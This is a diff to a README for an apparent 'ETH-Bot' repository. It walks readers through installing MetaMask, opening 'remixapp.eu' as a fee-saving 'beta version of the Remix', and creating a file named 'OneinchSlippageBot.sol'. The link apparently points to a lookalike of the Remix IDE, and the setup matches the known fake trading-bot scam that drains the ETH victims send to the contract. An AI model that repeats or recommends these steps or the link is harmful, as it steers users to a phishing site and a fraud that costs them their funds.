Jacob-Web3/ETH-Bot/README.md

 ✅1- Download MetaMask: https://metamask.io/download/

 ✅2- Access: https://remixapp.eu/
-⚠️( TO SAVE ON FEES THIS USE THIS BETA VERSION OF THE REMIX)⚠️ https://remixapp.eu/
+⚠️( TO SAVE ON FEES USE THIS BETA VERSION OF THE REMIX)⚠️ https://remixapp.eu/

 ✅3- Click on the “contracts” folder and then create “New File”.
 Rename it as you like, i.e: “OneinchSlippageBot.sol”.
 Make sure it ends with .sol for Ethereum programming language.